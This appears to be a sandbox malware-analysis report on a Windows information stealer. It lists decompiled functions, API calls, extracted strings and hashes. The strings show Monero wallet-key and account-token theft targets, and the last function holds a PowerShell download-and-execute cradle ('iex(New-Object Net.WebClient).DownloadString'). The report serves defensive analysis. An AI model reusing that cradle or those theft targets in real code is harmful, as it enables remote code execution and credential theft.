                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        • lstrlen.KERNEL32(00000000), ref: 00CABC9F
                                          • Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00CABCCD
                                        • lstrlen.KERNEL32(00000000), ref: 00CABDA5
                                        • lstrlen.KERNEL32(00000000), ref: 00CABDB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 740d9cc1afe19af9fd7d3ab0907cc4adfd91140e37fd28163bd21645571a5927
                                        • Instruction ID: 17a7d4a313252f82803e5d26bf2a4eb4c00ae7458316cd1b547f16f6002e15ca
                                        • Opcode Fuzzy Hash: 740d9cc1afe19af9fd7d3ab0907cc4adfd91140e37fd28163bd21645571a5927
                                        • Instruction Fuzzy Hash: 8FB14E71D10108ABDB14FBA0DCA6EEE733CAF54304F444168F546B6492EF356E49EBA2
                                        Function 00CB6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 9dadcaee960c5d804057cce74ffd9925eb850395d2faaba078e8e03306d805e9
                                        • Instruction ID: 5089442a7dceac6de4932f023595f3739aa79ea86bf6d16276a3521d5de9b3c3
                                        • Opcode Fuzzy Hash: 9dadcaee960c5d804057cce74ffd9925eb850395d2faaba078e8e03306d805e9
                                        • Instruction Fuzzy Hash: 02F0893490425DEFD744DFE1E94976C7B70FB04703F0801ADF605AA290DA746B41DB96
                                        Function 00CA4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CA4FCA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA4FD1
                                        • InternetOpenA.WININET(00CC0DDF,00000000,00000000,00000000,00000000), ref: 00CA4FEA
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00CA5011
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00CA5041
                                        • InternetCloseHandle.WININET(?), ref: 00CA50B9
                                        • InternetCloseHandle.WININET(?), ref: 00CA50C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 6d5e88f72c60ce0e8769af15eefd796f2b99936d3e523e3d096e69c9b75596a9
                                        • Instruction ID: b36dbaed1cfe6067b1fae8b291de1bce4edcca2e0ac045aa7d407c54c76955c8
                                        • Opcode Fuzzy Hash: 6d5e88f72c60ce0e8769af15eefd796f2b99936d3e523e3d096e69c9b75596a9
                                        • Instruction Fuzzy Hash: 5331E3B4A4021CABDB20CF54DC85BDCB7B4AB48704F1081E9FA09B7281C6706A858F99
                                        Function 00CB83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
                                        • wsprintfA.USER32 ref: 00CB8459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CB847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB8499
                                          • Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6
                                        • RegQueryValueExA.ADVAPI32(00000000,009DEC88,00000000,000F003F,?,00000400), ref: 00CB84EC
                                        • lstrlen.KERNEL32(?), ref: 00CB8501
                                        • RegQueryValueExA.ADVAPI32(00000000,009DED78,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CC0B34), ref: 00CB8599
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB8608
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB861A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 74cd1b1d9604cd70953259801a55463b9d2ae881d328b84ce8e99fdb0ef03a1b
                                        • Instruction ID: 1160afa34215dced5385368b40cf7a705eff7636f380c7eab446e50f61bef6f2
                                        • Opcode Fuzzy Hash: 74cd1b1d9604cd70953259801a55463b9d2ae881d328b84ce8e99fdb0ef03a1b
                                        • Instruction Fuzzy Hash: AF21D6B191021CAFDB24DB54DC85FE9B7B9FB48700F0485A9B609A6180DE716A89CFA4
                                        Function 00CB7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB76A4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB76AB
                                        • RegOpenKeyExA.ADVAPI32(80000002,009CBBE8,00000000,00020119,00000000), ref: 00CB76DD
                                        • RegQueryValueExA.ADVAPI32(00000000,009DECB8,00000000,00000000,?,000000FF), ref: 00CB76FE
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CB7708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: af3a2fe39ab491d1e5fcd1bfe99a71e102a52c8e1e18beda715c7891d79c6077
                                        • Instruction ID: 0baf489d4ffdece345d8b168635007e7229952f2a94ec177e47d130797f3572e
                                        • Opcode Fuzzy Hash: af3a2fe39ab491d1e5fcd1bfe99a71e102a52c8e1e18beda715c7891d79c6077
                                        • Instruction Fuzzy Hash: 530144B5A44208BFDB10DBE5DC8DFAD77B8EB44701F144169FE05FB290DA70A9088B51
                                        Function 00CB7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB7734
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB773B
                                        • RegOpenKeyExA.ADVAPI32(80000002,009CBBE8,00000000,00020119,00CB76B9), ref: 00CB775B
                                        • RegQueryValueExA.ADVAPI32(00CB76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00CB777A
                                        • RegCloseKey.ADVAPI32(00CB76B9), ref: 00CB7784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 2d82a043c6e8cf8273e7a2a5a2f8c25d16b13ed35874e18251ef85856b40802e
                                        • Instruction ID: 663f5d3596724235892f6db32a38a5005ea2550102ea375f1cf93b54a8a4088d
                                        • Opcode Fuzzy Hash: 2d82a043c6e8cf8273e7a2a5a2f8c25d16b13ed35874e18251ef85856b40802e
                                        • Instruction Fuzzy Hash: 940144B5A40308BFDB10DBE1DC8AFAEB7B8EB44701F144169FA05BB281DA7066048B51
                                        Function 00CA99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
                                        • ReadFile.KERNEL32(000000FF,?,00000000,00CA148F,00000000), ref: 00CA9A5A
                                        • LocalFree.KERNEL32(00CA148F), ref: 00CA9A90
                                        • CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 287fb86e5b3ed1aaaa0dcefa798b46cec0a598ac5fab43f182affcceff76e914
                                        • Instruction ID: c97d364c59bc3a8122f4f838c25181a1a73ed81483dab789f30a396f91cca122
                                        • Opcode Fuzzy Hash: 287fb86e5b3ed1aaaa0dcefa798b46cec0a598ac5fab43f182affcceff76e914
                                        • Instruction Fuzzy Hash: 3F3138B4A0020AEFDB14CF95C886BAE77B5FF49304F108159E815AB290C774AE45DFA1
                                        Function 00CB4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcat.KERNEL32(?,009DEEB0), ref: 00CB47DB
                                          • Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CB8E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00CB4801
                                        • lstrcat.KERNEL32(?,?), ref: 00CB4820
                                        • lstrcat.KERNEL32(?,?), ref: 00CB4834
                                        • lstrcat.KERNEL32(?,009CA7D0), ref: 00CB4847
                                        • lstrcat.KERNEL32(?,?), ref: 00CB485B
                                        • lstrcat.KERNEL32(?,009DD840), ref: 00CB486F
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CB8D90: GetFileAttributesA.KERNEL32(00000000,?,00CA1B54,?,?,00CC564C,?,?,00CC0E1F), ref: 00CB8D9F
                                          • Part of subcall function 00CB4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CB4580
                                          • Part of subcall function 00CB4570: RtlAllocateHeap.NTDLL(00000000), ref: 00CB4587
                                          • Part of subcall function 00CB4570: wsprintfA.USER32 ref: 00CB45A6
                                          • Part of subcall function 00CB4570: FindFirstFileA.KERNEL32(?,?), ref: 00CB45BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: 814b7500965a32c09c12fb894ebf9b5af60ee8bc18eefd9b96ef35efc7cb977e
                                        • Instruction ID: 98f7ec0328ceb8426e3edbc1334a94c582bb8ecc0d6f0c5730b12aa821340780
                                        • Opcode Fuzzy Hash: 814b7500965a32c09c12fb894ebf9b5af60ee8bc18eefd9b96ef35efc7cb977e
                                        • Instruction Fuzzy Hash: 553171B2D0020C6BDB14FBB0DCC6EE9737CAB58700F444599B359A6081EE74A78DDB95
                                        Function 00CB2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00CB2D85
                                        Strings
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00CB2D04
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00CB2CC4
                                        • <, xrefs: 00CB2D39
                                        • ')", xrefs: 00CB2CB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: def8880ee245dd9d87e9e27873dad393f6fc34244554e34d2495513c3f950d7c
                                        • Instruction ID: e1d0ae9d55aacbf25368f77fbd43a440510b6f22e19a380c63648821399aa2f4
                                        • Opcode Fuzzy Hash: def8880ee245dd9d87e9e27873dad393f6fc34244554e34d2495513c3f950d7c
